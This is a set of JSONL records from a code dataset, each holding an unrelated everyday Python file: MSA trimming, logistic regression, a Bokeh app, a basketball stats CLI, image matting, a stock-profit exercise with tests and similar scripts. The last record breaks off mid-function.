\"\"\"Returns a tuple of MSA columns that have beyond self.__max_gap gap\n fraction.\n\n Parameters\n ---------\n self : MSATrimmer\n An instance of MSATrimmer class\n\n Returns\n -------\n columns_to_remove : tuple\n A tuple containing columns that are going to to trimmed. These\n are MSA columns that have a gap fraction beyond self.__max_gap.\n \"\"\"\n columns_to_remove = self.msa_columns_beyond_max_gap()\n return tuple(columns_to_remove)\n\n\n def trim_by_refseq(self, remove_all_gaps=False):\n \"\"\"Obtains columns in MSA that contain gaps more that the gap treshold\n and do not involve residues in the best matchin sequence with reference.\n If remove_all_gaps is set True, all columns involving gaps in the matching\n sequence to reference are removed.\n\n Parameters\n ----------\n self : MSATrimmer\n An instance of MSATrimmer\n remove_all_gaps : bool\n If set to True, all columns with gaps in the matching sequence\n with the reference are removed.\n\n Returns\n -------\n columns_to_remove : tuple\n A tuple of MSA column positions. These columns are going to\n be removed from the MSA.\n \"\"\"\n seqbackmapper = SequenceBackmapper(msa_file = self.__msa_file,\n refseq_file = self.__refseq_file,\n biomolecule = self.__biomolecule,\n )\n matching_seqs = seqbackmapper.find_matching_seqs_from_alignment()\n logger.info('\\n\\tRemoving gapped columns corresponding to best'\n ' matching sequence to the reference'\n )\n first_matching_seq = matching_seqs[0]\n logger.info('\\n\\tSequence in MSA that matches the reference'\n '\\n\\t{}'.format(first_matching_seq)\n )\n\n gap_symbols = ['-', '.']\n if not remove_all_gaps:\n candidate_columns_to_remove = self.msa_columns_beyond_max_gap()\n # find out MSA columns that does correspond to gaps w.r.t the sequence\n # in MSA that matches with the reference\n logger.info('\\n\\tNumber of columns with more than {0:.2f}% gaps:{1}'\n ''.format(self.__max_gap* 100, len(candidate_columns_to_remove))\n )\n columns_to_remove = [\n i for i in candidate_columns_to_remove if first_matching_seq[i] in gap_symbols\n ]\n logger.info('\\n\\tNumber of columns to remove: {}'.format(len(columns_to_remove)))\n else: # if remove all gaps\n logger.info('\\n\\tRemoving all columns corresponding to gaps in the matching sequence')\n seqs_len = len(self.__alignment_data[0].seq)\n columns_to_remove = [\n i for i in range(seqs_len) if first_matching_seq[i] in gap_symbols\n ]\n logger.info('\\n\\tNumber of columns to be removed from MSA:{}'.format(\n len(columns_to_remove))\n )\n\n return tuple(columns_to_remove)\n\n \n def get_msa_trimmed_by_refseq(self, remove_all_gaps=False):\n \"\"\"\n \"\"\"\n columns_to_remove = self.trim_by_refseq(remove_all_gaps=remove_all_gaps)\n trimmed_msa = list()\n for record in self.__alignment_data:\n seq, seqid = record.seq, record.id\n trimmed_seq = [seq[i] for i in range(len(seq)) if i not in columns_to_remove]\n id_seq_pair = seqid, ''.join(trimmed_seq) \n trimmed_msa.append(id_seq_pair)\n return trimmed_msa\n\n","sub_path":"pydca/msa_trimmer/msa_trimmer.py","file_name":"msa_trimmer.py","file_ext":"py","file_size_in_byte":7645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"13519783","text":"#coding: utf-8\n\ndef mult(m,n) : \n\tdef loop (n, result):\n\t\tif n <= 0 : \n\t\t\treturn result\n\t\telse : \n\t\t\treturn loop(n-1, result + m)\n\n\treturn loop(n, 0)\n\n\nm = int(input(\"m?\"))\nn = int(input(\"n?\"))\nprint(mult(m,n))\n","sub_path":"Day5/2-1.py","file_name":"2-1.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"601191159","text":"import numpy as np \r\nimport pandas as pd \r\nfrom matplotlib import pyplot as plt \r\nimport pathlib\r\ndata = pd.read_csv(str(pathlib.Path(__file__).parent.absolute()) + \"\\ex2data1.txt\")\r\nt = [0,0,0]\r\ndata[\"x0\"] = np.ones(len(data))\r\ndef plot():\r\n admitted = data[data[\"y\"]==1]\r\n not_admitted = data[data[\"y\"]==0]\r\n plt.scatter(admitted[\"x1\"],admitted[\"x2\"])\r\n plt.scatter(not_admitted[\"x1\"],not_admitted[\"x2\"])\r\n plt.legend(loc = \"upper right\",labels = [\"Admitted\",\"NotAdmitted\"])\r\n plt.show()\r\ndef g(z):\r\n return 1/(1+np.exp(-z))\r\ndef h(i):\r\n return g(t[0] + t[1] * data[\"x1\"][i] + t[2] * data[\"x2\"][i])\r\ndef j():\r\n s = 0\r\n for i in range(len(data)):\r\n s+= (data[\"y\"][i]*np.log(h(i)+0.0000001)) - (1-data[\"y\"][i])*np.log(1-h(i)+0.0000001)\r\n return 1/len(data)*s\r\ndef gradientdescent(t,alpha):\r\n temp = [0,0,0]\r\n s = [0,0,0]\r\n for j in range(len(t)):\r\n for i in range(len(data)):\r\n s[j]+= (h(i) - data[\"y\"][i])*data[\"x\"+str(j)][i]\r\n for j in range(len(t)):\r\n temp[j] = t[j] - alpha/len(data)*s[j]\r\n return temp\r\nepochs = 400\r\nfor i in range(epochs):\r\n t = gradientdescent(t,0.001)\r\ncorrect = 0\r\nfor i in range(len(data)):\r\n if h(i)>0.5:\r\n if data[\"y\"][i] == 1:\r\n correct+=1\r\n elif h(i)<=0.5:\r\n if data[\"y\"][i] == 0:\r\n correct +=1\r\nprint(correct/len(data)*100)\r\n","sub_path":"Logistic_Regression.py","file_name":"Logistic_Regression.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"489970649","text":"import os\nimport json\nfrom bokeh.server.server import Server\nfrom tornado.ioloop import IOLoop\nfrom dataspot.visualization.visual_builder import VisualBuilder\nfrom dataspot.visualization.visual_helper import VisualHelper\nfrom dataspot.scripts.script_grouper import ScriptGrouper\nfrom dataspot.relationships.relationships_director import RelationshipsDirector\nfrom dataspot.relationships.import_director import ImportDirector\nfrom dataspot.relationships.writer.text_file_writer import TextFileWriter\n\nroot = os.path.abspath(os.sep)\nparser_config_path = os.path.join(root, 'dataspot/parser_config.json')\n\nconfig_path = os.path.join(root, 'app/data/config/dataspot_config.json')\nconfig_present = os.path.isfile(config_path)\n\nresults_path = os.path.join(root, 'app/data/results/dataspot_results.json')\nresults_present = os.path.isfile(results_path)\n\nscripts_present = os.listdir(os.path.join(root, 'app/data/scripts'))\n\nexcel_path = os.path.join(root, 'app/data/excel')\nexcel_present = os.listdir(excel_path)\n\nmanual_relationships_path = os.path.join(root, 'app/data/manual/manual_relationships.json')\nmanual_relationships_present = os.path.isfile(results_path)\n\n\nif results_present:\n f = open(results_path)\n relationships = json.load(f)\n f.close()\nelse:\n if scripts_present:\n scripts_path = os.path.join(root, 'app/data/scripts')\n else:\n scripts_path = os.path.join(root, 'app/example/scripts')\n\n scripts = ScriptGrouper.group(scripts_path=scripts_path)\n relationships = RelationshipsDirector.build(scripts=scripts, parser_config_path=parser_config_path)\n\n if not scripts_present:\n print('Oeps, no scripts present. I will take the example scripts')\n f = open(os.path.join(root, 'app/example/manual/manual_relationships.json'))\n manual_relationships = json.load(f)\n f.close()\n relationships = {**relationships, **manual_relationships}\n\n excel_path_example = os.path.join(root, 'app/example/excel')\n\n import_director = ImportDirector(relationships=relationships)\n import_director.build(path=excel_path_example)\n relationships = import_director.get_relationships()\n\n else:\n if manual_relationships_present:\n print('I am reading the manual relationships')\n f = open(manual_relationships_path)\n manual_relationships = json.load(f)\n f.close()\n relationships = {**relationships, **manual_relationships}\n\n if excel_present:\n print('I am reading the excel files')\n import_director = ImportDirector(relationships=relationships)\n import_director.build(path=excel_path)\n relationships = import_director.get_relationships()\n\n results_path = os.path.join(root, 'app/data/results')\n relationships_path = TextFileWriter.write(results_path=results_path, data=relationships,\n title='dataspot_results', timestamp=False, extension='json')\n print(\"Here are the new relationships located from now on: \" + relationships_path)\n\nif config_present:\n f = open(config_path)\n config = json.load(f)\n f.close()\nelse:\n f = open(os.path.join(root, 'dataspot/dataspot_config.json'))\n config = json.load(f)\n f.close()\n\n\ndef modify_doc(doc):\n visualbuilder = VisualBuilder(config=config, relationships=relationships)\n\n # Setup the working document\n doc = VisualHelper.setup_doc(doc)\n\n # Setup the visualization\n visualbuilder.build()\n\n # Add the visualization to the working document\n doc.add_root(visualbuilder.get_visual())\n\n\ndef bk_worker():\n server = Server({'/bkapp': modify_doc}, io_loop=IOLoop(), allow_websocket_origin=[\"0.0.0.0:5000\"])\n server.start()\n server.io_loop.start()\n\n\nfrom threading import Thread\nThread(target=bk_worker).start()","sub_path":"dataspot-bokeh/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"456703378","text":"\"\"\"\nPython Web Development Techdegree\nProject 2 - Basketball Team Stats Tool\n--------------------------------------\n\"\"\"\n\n\nfrom constants import PLAYERS, TEAMS\nimport copy\nimport os\nimport random\nfrom typing import Any, Dict, List, Tuple\n\n\nMENU_OPTIONS = ['Display Team Stats', 'Quit']\n\n\ndef clear_console() -> None:\n \"\"\"Clears the console\"\"\"\n os.system('cls' if os.name == 'nt' else 'clear')\n\n\ndef display_options(options: List) -> None:\n \"\"\"Iterate over a collection and prints out the index and value\"\"\"\n for count, option in enumerate(options):\n print(f'{count + 1}) {option}')\n\n\ndef display_menu(title: str, options: List) -> None:\n \"\"\"Displays a menu\"\"\"\n clear_console()\n print('BASKETBALL TEAM STATS TOOL\\n')\n print(f'---- {title} ----\\n')\n\n display_options(options)\n\n\ndef prompt_user(prompt_msg: str, num_options: int) -> int:\n \"\"\"Prompts the user for an option (int) between 1 and 'num_options'\n Returns the user response\n \"\"\"\n MIN_OPTION = 1\n MAX_OPTION = num_options\n\n while True:\n try:\n user_input = int(input(prompt_msg))\n\n if user_input < MIN_OPTION or user_input > MAX_OPTION:\n raise ValueError(f'Please only a option between {MIN_OPTION} and {MAX_OPTION}')\n except ValueError as err:\n print(f'Invald input: {err}')\n else:\n return user_input\n\n\ndef cleaned_data() -> List:\n \"\"\"Cleans the PLAYERS data\n Converts the height into an integer\n Converts experience into a boolean (True/False)\n Converts guardians into a list of names\n Returns a set containing the cleaned PLAYERS data\n \"\"\"\n players: List[Dict[str, Any]] = copy.deepcopy(PLAYERS)\n\n for player in players:\n try:\n player[\"height\"] = int(player[\"height\"][:2])\n except ValueError as err:\n print(f'Error: {err}')\n else:\n if player[\"experience\"] == \"YES\":\n player[\"experience\"] = True\n else:\n player[\"experience\"] = False\n\n player[\"guardians\"] = player[\"guardians\"].split(' and ')\n\n return players\n\n\ndef get_avg_height(team: List) -> float:\n \"\"\"Calculates the average height of a team\"\"\"\n return sum([player[\"height\"] for player in team]) / len(team)\n\n\ndef extract_players(players: List, experienced: bool) -> List:\n \"\"\"Extracts players depending on their experience\n Returns the extracted players\n \"\"\"\n return [player for player in players if player[\"experience\"] == experienced]\n\n\ndef create_team(players: List) -> Tuple[List, List]:\n \"\"\"Creates a balanced team with equal numbers of experiencd and inexperienced players\n Players added to the team is randomly picked\n Returns the created team and the remaining players\n \"\"\"\n exp_players = extract_players(players, True)\n inexp_players = extract_players(players, False)\n\n # selects 6 players randomly\n # 3 experienced players and 3 inexperienced players\n team = random.sample(exp_players, k=3) + random.sample(inexp_players, k=3)\n\n # removes the picked players from the list of available players\n players = [player for player in players if player not in team]\n\n return (team, players)\n\n\ndef generate_teams() -> Tuple[List, List, List]:\n \"\"\"Generates the teams\"\"\"\n players = cleaned_data()\n\n panthers, players = create_team(players)\n bandits, players = create_team(players)\n warriors, players = create_team(players)\n\n return (panthers, bandits, warriors)\n\n\ndef display_team_stats(team: List) -> None:\n \"\"\"Display the stats of a team\"\"\"\n exp_players = [player for player in team if player[\"experience\"] == True]\n num_exp_players = len(exp_players)\n \n print(f'Total players: {len(team)}')\n print(f'Average height: {get_avg_height(team)}')\n print(f'Number of experienced players: {num_exp_players}')\n print(f'Number of inexperienced players: {len(team) - num_exp_players}')\n\n\ndef display_names(title: str, names_list: List) -> None:\n \"\"\"Display names in a list\"\"\"\n print(f'\\n{title}:')\n print(f'\\t{\", \".join(names_list)}')\n\n\ndef display_team(team_name: str, team: List) -> None:\n \"\"\"Display a team\"\"\"\n players = [player[\"name\"] for player in team]\n guardians = [guardian for player in team for guardian in player[\"guardians\"]]\n\n clear_console()\n print(f'TEAM: {team_name}')\n print('----------------')\n display_team_stats(team)\n display_names('Players on team', players)\n display_names('Guardians', guardians)\n input('\\nPress ENTER to continue...')\n\n\ndef start() -> None:\n \"\"\"Main function that runs the program\"\"\"\n still_running = True\n teams = generate_teams()\n\n while still_running:\n display_menu('MENU', MENU_OPTIONS)\n user_input = prompt_user('\\nEnter option: ', len(MENU_OPTIONS))\n\n if user_input == 2:\n still_running = False\n elif user_input == 1:\n checking_teams = True\n\n while checking_teams:\n team_menu = TEAMS + ['Main menu']\n display_menu('TEAMS', team_menu)\n\n user_input = prompt_user('\\nEnter team: ', len(team_menu))\n\n if user_input == 4:\n checking_teams = False\n else:\n idx = user_input - 1\n display_team(TEAMS[idx], teams[idx])\n\n\nif __name__ == '__main__':\n start()\n\n","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"35178994","text":"from . import loadf\nfrom .interactive import console\nfrom .parser import StekkSyntaxError, parse\nfrom .vm import VM\nimport sys\n\nif len(sys.argv) == 1:\n console()\nelif len(sys.argv) > 1:\n filenames = sys.argv[1:]\n vm = VM([])\n for filename in filenames:\n try:\n statements = loadf(filename).statements\n vm.statements.extend(statements)\n except FileNotFoundError:\n print(\"File not found:\", filename)\n exit(1)\n except StekkSyntaxError as e:\n print(e.error)\n exit(2)\n vm.run()\n console(vm)","sub_path":"stekk/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"632788203","text":"import cv2\r\nfrom PIL import Image\r\nimport numpy as np\r\n\r\n'''\r\npython利用蒙版抠图 \r\nhttps://www.cxyzjd.com/article/qq_29391809/106036745\r\n输入原图和mask图片,输出背景透明的图片\r\n'''\r\n\r\n\r\nclass UnsupportedFormat(Exception):\r\n def __init__(self, input_type):\r\n self.t = input_type\r\n\r\n def __str__(self):\r\n return \"不支持'{}'模式的转换,请使用为图片地址(path)、PIL.Image(pil)或OpenCV(cv2)模式\".format(self.t)\r\n\r\n\r\nclass MatteMatting():\r\n def __init__(self, original_graph, mask_graph, input_type='path'):\r\n \"\"\"\r\n 将输入的图片经过蒙版转化为透明图构造函数\r\n :param original_graph:输入的图片地址、PIL格式、CV2格式\r\n :param mask_graph:蒙版的图片地址、PIL格式、CV2格式\r\n :param input_type:输入的类型,有path:图片地址、pil:pil类型、cv2类型\r\n \"\"\"\r\n if input_type == 'path':\r\n self.img1 = cv2.imread(original_graph)\r\n self.img2 = cv2.imread(mask_graph)\r\n elif input_type == 'pil':\r\n self.img1 = self.__image_to_opencv(original_graph)\r\n self.img2 = self.__image_to_opencv(mask_graph)\r\n elif input_type == 'cv2':\r\n self.img1 = original_graph\r\n self.img2 = mask_graph\r\n else:\r\n raise UnsupportedFormat(input_type)\r\n\r\n @staticmethod\r\n def __transparent_back(img):\r\n \"\"\"\r\n :param img: 传入图片地址\r\n :return: 返回替换白色后的透明图\r\n \"\"\"\r\n img = img.convert('RGBA')\r\n L, H = img.size\r\n color_0 = (255, 255, 255, 255) # 要替换的颜色\r\n for h in range(H):\r\n for l in range(L):\r\n dot = (l, h)\r\n color_1 = img.getpixel(dot)\r\n if color_1 == color_0:\r\n color_1 = color_1[:-1] + (0,)\r\n img.putpixel(dot, color_1)\r\n return img\r\n\r\n def save_image(self, path, mask_flip=False):\r\n \"\"\"\r\n 用于保存透明图\r\n :param path: 保存位置\r\n :param mask_flip: 蒙版翻转,将蒙版的黑白颜色翻转;True翻转;False不使用翻转\r\n \"\"\"\r\n if mask_flip:\r\n img2 = cv2.bitwise_not(self.img2) # 黑白翻转\r\n image = cv2.add(self.img1, img2)\r\n image = Image.fromarray(cv2.cvtColor(image, cv2.COLOR_BGR2RGB)) # OpenCV转换成PIL.Image格式\r\n img = self.__transparent_back(image)\r\n img.save(path)\r\n\r\n @staticmethod\r\n def __image_to_opencv(image):\r\n \"\"\"\r\n PIL.Image转换成OpenCV格式\r\n \"\"\"\r\n img = cv2.cvtColor(np.asarray(image), cv2.COLOR_RGB2BGR)\r\n return img\r\n \r\nif __name__ == '__main__':\r\n \r\n mm = MatteMatting(\"2.png\", \"mask.jpg\")\r\n mm.save_image(\"output.png\", mask_flip=True) # mask_flip是指蒙版翻转,即把白色的变成黑色的,黑色的变成白色的","sub_path":"get_transparet_background_image.py","file_name":"get_transparet_background_image.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"180124809","text":"# CompetitiveProgramming\n\ndef get_max_profit(stock_prices):\n\n # Calculate the max profit\n\tif len(stock_prices) > 2:\n\t\tresult = -1000000\n\t\tfor x in range(0,len(stock_prices)-1):\n\t\t\tfor y in range(x+1,len(stock_prices)):\n\t\t\t\tsum = stock_prices[y] - stock_prices[x]\n\t\t\t\tif sum > result:\n\t\t\t\t\tresult = sum\n\t\treturn result\n\tif len(stock_prices) < 2:\n\t\traise Exception (\"invalid input\")\n\n\n\n# Tests\n\nimport unittest\n\nclass Test(unittest.TestCase):\n\n def test_price_goes_up_then_down(self):\n actual = get_max_profit([1, 5, 3, 2])\n expected = 4\n self.assertEqual(actual, expected)\n\n def test_price_goes_down_then_up(self):\n actual = get_max_profit([7, 2, 8, 9])\n expected = 7\n self.assertEqual(actual, expected)\n\n def test_price_goes_up_all_day(self):\n actual = get_max_profit([1, 6, 7, 9])\n expected = 8\n self.assertEqual(actual, expected)\n\n def test_price_goes_down_all_day(self):\n actual = get_max_profit([9, 7, 4, 1])\n expected = -2\n self.assertEqual(actual, expected)\n\n def test_price_stays_the_same_all_day(self):\n actual = get_max_profit([1, 1, 1, 1])\n expected = 0\n self.assertEqual(actual, expected)\n\n def test_one_price_raises_error(self):\n with self.assertRaises(Exception):\n get_max_profit([1])\n\n def test_empty_list_raises_error(self):\n with self.assertRaises(Exception):\n get_max_profit([])\n\nunittest.main(verbosity=2)\n","sub_path":"week-1/day-1/appleStocks.py","file_name":"appleStocks.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"116586731","text":"\"\"\"Snakemake wrapper for vembrane\"\"\"\n\n__author__ = \"Christopher Schröder\"\n__copyright__ = \"Copyright 2020, Christopher Schröder\"\n__email__ = \"christopher.schroeder@tu-dortmund.de\"\n__license__ = \"MIT\"\n\nfrom snakemake.shell import shell\n\nlog = snakemake.log_fmt_shell(stdout=False, stderr=True)\n\nextra = snakemake.params.get(\"extra\", \"\")\n\nshell(\n \"vembrane\" # Tool and its subcommand\n \" {extra}\" # Extra parameters\n ' \"{snakemake.params.expression}\"'\n \" {snakemake.input.vcf}\" # Path to input vcf file\n \" > {snakemake.output.vcf}\" # Path to output vcf file\n \" {log}\" # Logging behaviour\n)\n","sub_path":"bio/vembrane/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"458331106","text":"#coding=utf-8\n#Head_First_Python第一章-为函数增加第三个参数\n#我们发现有的人并不喜欢用TAB来进行制表那么我们在参数中添加了第三个关键值indent\ndef print_lol(the_list,indent=False,level=0): #增加一个名为indent的参数,默认为False(假)\n for each_item in the_list:\n if isinstance(each_item,list):\n print_lol(each_item,indent,level+1) #!!!同1.6一样,我们在递归调用中添加新添加的参数值\n else:\n if indent: #我们判断indent 是真(True)或假(False) 这全看调用函数时传递的参数\n #print_lol(movies,0)0代表假,如果是这样则不执行\n #print_lol(movies,1~n)代表真超过0的值都代表真,代表真的情况下会继续执行下面代码块\n for tab_stop in range(level):\n print ('\\t', end='')\n print (each_item)\n \nmovies = [\"The hold Graill\", 1975 ,\"Terry Jones & Terry Gilliam\", 91,\\\n [\"Graham Chapman\",[\"Micheal Palin\", \"John Cleese\",\"Terry Gilliam\",\\\n \"Eric Idie\", \"Terry Jones\"]]]\n\nprint_lol(movies,1)","sub_path":"1.7.py","file_name":"1.7.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"603564367","text":"import re\nimport requests\n\nroot = 'https://avio.pw/cn/'\nkeywords = 'f'\nurl = root + keywords\nr = requests.get(url)\nr.raise_for_status()\nr.encoding = r.apparent_encoding\n#print(r.text)\npattern=re.compile(r'https://jp.netcdn.space/digital/video/.*?jpg',re.S)\na=re.findall(pattern,r.text)\nprint(a)","sub_path":"5.24.py","file_name":"5.24.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"411444130","text":"# Written by: Akshay Gangal\n# Tested by: Akshay Gangal\n\nimport numpy as np\nimport pandas as pd\nimport math\nimport random\nimport Common\nfrom scipy.stats import truncnorm\n\n## EntrySet - Class for combining entries from multiple datasets and minimzing errors added during generation \n#\nclass EntrySet:\n ## The constructor.\n # @param self The object pointer\n def __init__(self):\n H = Common.Helper()\n self.NormDistribution = np.zeros((len(H.GetZoneMap()),len(H.GetCusineMap()),10))\n self.Cusine_val = [0] * len(H.GetCusineMap())\n self.Current_subset = 0\n\n\n ## Validate rounding correction result.\n # @param self The object pointer\n # arr1 Array to validate the sum of\n # total_arr Expected value array\n def ValidateCorrection(self, arr1, total_arr):\n for row in range(0,len(arr1)):\n assert (sum(arr1[row]) == total_arr[row]),\"Rounding correction failed!!!\"\n\n\n # Calculate normalized weights for each cusine category\n # and get the scaled number of entries of each type\n def GenerateCusineDistribution(self):\n H = Common.Helper()\n num_entries = H.GetNumSubsetEntries()\n for val in range(0, len(H.GetCusineMap())):\n self.Cusine_val[val] = math.floor(float(num_entries)/len(H.GetCusineMap()))\n\n # Correct the error generated due to rounding\n H.RoundingCorrection(self.Cusine_val,num_entries,len(self.Cusine_val))\n\n\n ## Generate Truncated Normal distribution of values for input Zone type\n # @param self The object pointer\n # ZoneEntry Table of input values to generate normal distribution on\n # Zone_type Type of Zone used for normalization\n def GenerateTruncatedNormal(self,ZoneEntry):\n H = Common.Helper()\n sd = 5\n for Zone in range(0,len(ZoneEntry[0])):\n for cusine in range(0,len(ZoneEntry)):\n mean_old = ZoneEntry[cusine][Zone]\n low = mean_old - sd\n high = mean_old + sd\n X = truncnorm((low - mean_old) / sd, (high - mean_old) / sd, loc=mean_old, scale=sd)\n self.NormDistribution[Zone][cusine] = np.round(X.rvs(10),2)\n\n ## Get input data for Zone distribution vs Cusine type from csv file\n # @param self The object pointer\n def GetEntrySet(self):\n H = Common.Helper()\n\n ## @var df - Pandas Data frame to get Zone entries from csv file\n #\n df = pd.read_csv('Food_Location.csv')\n\n num_rows_zone = df.shape[0]\n num_columns_zone = df.shape[1]\n\n ## @var ZoneEntry - numpy array: Food category vs Zone list\n #\n ZoneEntry = np.zeros((num_rows_zone, num_columns_zone - 1))\n for row in range(0,num_rows_zone):\n for column in range(1,num_columns_zone):\n ZoneEntry[row][column-1] = int(df.iloc[row][column] * 100)\n\n return ZoneEntry\n\n ## Read and compute Zone entry count Tables\n # @param self The object pointer\n def CreateNormalizedSet(self,ZoneEntry,entryset):\n H = Common.Helper()\n num_entries = H.GetNumSubsetEntries()\n DistInc = H.GetDistIncrease()\n DistDec = H.GetDistDecrease()\n DistGaus = H.GetDistGaussian()\n\n column_list = []\n # Increase\n for key,val in DistInc.items():\n row = H.GetKeyByValue(H.GetCusineMap(),(H.GetKeyByValue(H.GetCusineType(),key,False)),True)\n column = H.GetKeyByValue(H.GetZoneMap(),val,True)\n if column not in column_list:\n column_list.append(column)\n if entryset == 0:\n ZoneEntry[row][column] = round(min(self.NormDistribution[column][row]),2)\n elif entryset == 1:\n ZoneEntry[row][column] = round(sorted(self.NormDistribution[column][row])[1],2)\n elif entryset == 3:\n ZoneEntry[row][column] = round(sorted(set(self.NormDistribution[column][row]))[-2],2)\n elif entryset == 4:\n ZoneEntry[row][column] = round(max(self.NormDistribution[column][row]),2)\n elif entryset != 2:\n assert(0),\"Invalid entry set\"\n\n # Gaussian\n for key,val in DistGaus.items():\n row = H.GetKeyByValue(H.GetCusineMap(),(H.GetKeyByValue(H.GetCusineType(),key,False)),True)\n column = H.GetKeyByValue(H.GetZoneMap(),val,True)\n if column not in column_list:\n column_list.append(column)\n if entryset == 0 or entryset == 4:\n ZoneEntry[row][column] = round(min(self.NormDistribution[column][row]),2)\n elif entryset == 1 or entryset == 3:\n ZoneEntry[row][column] = round(sorted(self.NormDistribution[column][row])[1],2)\n elif entryset != 2:\n assert(0),\"Invalid entry set\"\n\n # Decrease\n for key,val in DistDec.items():\n row = H.GetKeyByValue(H.GetCusineMap(),(H.GetKeyByValue(H.GetCusineType(),key,False)),True)\n column = H.GetKeyByValue(H.GetZoneMap(),val,True)\n if column not in column_list:\n column_list.append(column)\n if entryset == 0:\n ZoneEntry[row][column] = round(max(self.NormDistribution[column][row]),2)\n elif entryset == 1:\n ZoneEntry[row][column] = round(sorted(set(self.NormDistribution[column][row]))[-2],2)\n elif entryset == 3:\n ZoneEntry[row][column] = round(sorted(self.NormDistribution[column][row])[1],2)\n elif entryset == 4:\n ZoneEntry[row][column] = round(min(self.NormDistribution[column][row]),2)\n elif entryset != 2:\n assert(0),\"Invalid entry set\"\n\n ## Adjust the remaining entries\n sum_val = 0\n for row in range(0,len(ZoneEntry)):\n sum_val = sum(ZoneEntry[row])\n if 100 - sum_val >= 0:\n error = 100 - sum_val\n error1 = int(error)\n delta = error - error1\n while error1 > 0:\n column_val = random.randint(0,len(ZoneEntry[0])-1)\n if column_val not in column_list:\n ZoneEntry[row][column_val] += 1\n error1 -= 1\n column_val = random.randint(0,len(ZoneEntry[0])-1)\n ZoneEntry[row][column_val] += delta \n else:\n error = sum_val - 100\n error1 = int(error)\n delta = error - error1\n while error1 > 0:\n column_val = random.randint(0,len(ZoneEntry[0])-1)\n if column_val not in column_list:\n ZoneEntry[row][column_val] -= 1\n error1 -= 1\n column_val = random.randint(0,len(ZoneEntry[0])-1)\n ZoneEntry[row][column_val] -= delta\n\n assert (sum(ZoneEntry[row]) == 100), \"Incorrect adjustment for remaining entries\"\n\n # Add rounding correction\n for row in range(0,len(ZoneEntry)):\n for column in range(0,len(ZoneEntry[0])):\n ZoneEntry[row][column] = math.floor((ZoneEntry[row][column] * self.Cusine_val[row])/100)\n H.RoundingCorrection(ZoneEntry[row],self.Cusine_val[row],len(ZoneEntry[row]))\n\n # Validate rounding correction\n self.ValidateCorrection(ZoneEntry,self.Cusine_val)\n\n max_length = 0;\n for key,val in H.GetCusineType().items():\n if len(val) > max_length:\n max_length = len(val)\n\n # Add rounding correction\n Cusine_Entry = np.zeros((len(H.GetCusineMap()),len(H.GetZoneMap()),max_length))\n for row in range(0,len(ZoneEntry)): \n Cusine_len = len(H.GetCusineType().get((H.GetCusineMap().get(row))))\n for column in range(0,len(ZoneEntry[0])):\n for val in range(0,Cusine_len):\n Cusine_Entry[row][column][val] = math.floor(ZoneEntry[row][column]/Cusine_len)\n H.RoundingCorrection(Cusine_Entry[row][column],ZoneEntry[row][column],Cusine_len)\n # Validate rounding correction\n self.ValidateCorrection(Cusine_Entry[row],ZoneEntry[row])\n #print(\"\\nError corrected Zone distribution\\n\")\n #print(ZoneEntry)\n\n #return ZoneEntry\n return Cusine_Entry,max_length\n","sub_path":"1_code/TimeVariation/TimeVariation/GenerateEntrySet.py","file_name":"GenerateEntrySet.py","file_ext":"py","file_size_in_byte":8379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"275556402","text":"import sys\nimport argparse\nimport json\n\nparser = argparse.ArgumentParser()\nparser.add_argument('path', type=str, default='There is no path', help='This is the file path')\narg_obj = parser.parse_args()\npath = arg_obj.path\nprint(path)\n\n\nwith open(path) as file_ob:\n data_json = json.load(file_ob)\n\nprint(data_json)","sub_path":"first_class_assignment/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"211892015","text":"def answer(total_lambs):\n \n # Here's how I solved it..\n \n # From the promblem we know:\n # MIN Paycheck = sum of previous 2 paychecks\n # MAX Paycheck = x2 previous paycheck\n \n # I wrote the function \"calc_paychecks\" that\n # builds lists of paychecks from these rules. \n \n # ex. total_lambs = 5\n # min_paychecks = [1, 1, 2]\n # max_paychecks = [1, 2]\n\n # The function also handles remaining lambs.\n # When remaining lambs CANNOT pay a FULL paycheck\n # but CAN pay more at least the min_paycheck - \n # then henchmen is still hired.\n \n # ex. total_lambs = 6\n # min_paychecks = [1, 1, 2]\n # max_paychecks = [1, 2, 3] <- 3 is remainder\n\n def calc_paychecks(total_lambs, max_min):\n\n # Problem says first paycheck is 1 lamb \n paychecks = [0,1]\n \n # While there's money left keep hiring henchmen\n while sum(paychecks) < total_lambs:\n # Previous two paychecks\n prev_paycheck_1 = paychecks[-1]\n prev_paycheck_2 = paychecks[-2]\n # Maxmum / Minimum possible paychecks\n max_paycheck = prev_paycheck_1 * 2\n min_paycheck = prev_paycheck_1 + prev_paycheck_2\n \n if max_min == \"max\":\n paycheck = max_paycheck\n elif max_min == \"min\":\n paycheck = min_paycheck\n \n remainder = total_lambs - sum(paychecks)\n \n # If remainder can pay FULL salary...\n if remainder >= paycheck:\n 